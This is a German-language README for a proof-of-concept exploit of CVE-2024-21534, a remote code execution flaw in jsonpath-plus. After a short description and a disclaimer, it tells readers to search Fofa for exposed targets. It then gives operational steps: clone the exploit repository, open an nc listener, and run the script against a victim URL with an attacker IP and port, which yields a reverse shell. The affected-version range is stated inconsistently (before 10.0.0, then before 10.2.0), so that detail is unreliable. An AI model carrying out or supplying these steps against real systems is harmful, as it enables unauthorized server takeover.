
POC - CVE-2024-21534 Jsonpath-plus vulnerable to Remote Code Execution (RCE) due to improper input sanitization
CVE-2024-21534 ist eine kritische Sicherheitslücke, die in Versionen des jsonpath-plus-Pakets vor Version 10.0.0 gefunden wurde. Die Sicherheitslücke resultiert aus unzureichender Eingabebereinigung, was zu Remote Code Execution (RCE) auf betroffenen Systemen führen kann. Diese Sicherheitslücke ist besonders gefährlich, da sie ohne Authentifizierung ausgenutzt werden kann, was Angreifern ermöglicht, beliebigen Code auf dem Server durch das Senden speziell gestalteter Eingaben auszuführen. Dieses Problem entsteht durch die unsichere Standardnutzung des Node.js vm-Moduls, das bei Ausnutzung das gesamte System gefährden könnte.
jsonpath-plus Versionen vor 10.2.0
Die Sicherheitslücke befindet sich im jsonpath-plus-Paket, das häufig zum Abfragen von JSON-Datenstrukturen in Anwendungen verwendet wird. Der Fehler ist auf unzureichende Eingabebereinigung zurückzuführen, was die Ausführung von schädlichem Code ermöglicht.
Lesen Sie mehr dazu — CVE-2024-21534
Haftungsausschluss: Dieser Proof of Concept (POC) dient nur zu Bildungs- und ethischen Testzwecken. Die Verwendung dieses Tools zum Angriff auf Ziele ohne vorherige gegenseitige Zustimmung ist illegal. Es liegt in der Verantwortung des Endbenutzers, alle geltenden lokalen, staatlichen und bundesstaatlichen Gesetze einzuhalten. Die Entwickler übernehmen keine Haftung und sind nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Programm verursacht werden.
Um potenzielle Ziele zu finden, verwenden Sie Fofa (ähnlich wie Shodan.io):
Jsonpath-plus
Klonen Sie zunächst das Repository:
git clone https://github.com/verylazytech/CVE-2024-21534
Öffnen Sie nun einen Listener mit nc:
nc -lnvp 443
Führen Sie den Exploit aus:
Stellen Sie sicher, dass die URL auf einen Endpunkt zeigt, der Benutzereingaben über das anfällige jsonpath-plus-Paket verarbeitet, da dies die Ausnutzung der RCE-Sicherheitslücke ermöglicht.
bash ./cve-2024-21534.sh <VICTIM_URL> <ATTACKER_IP> <ATTACKER_PORT>

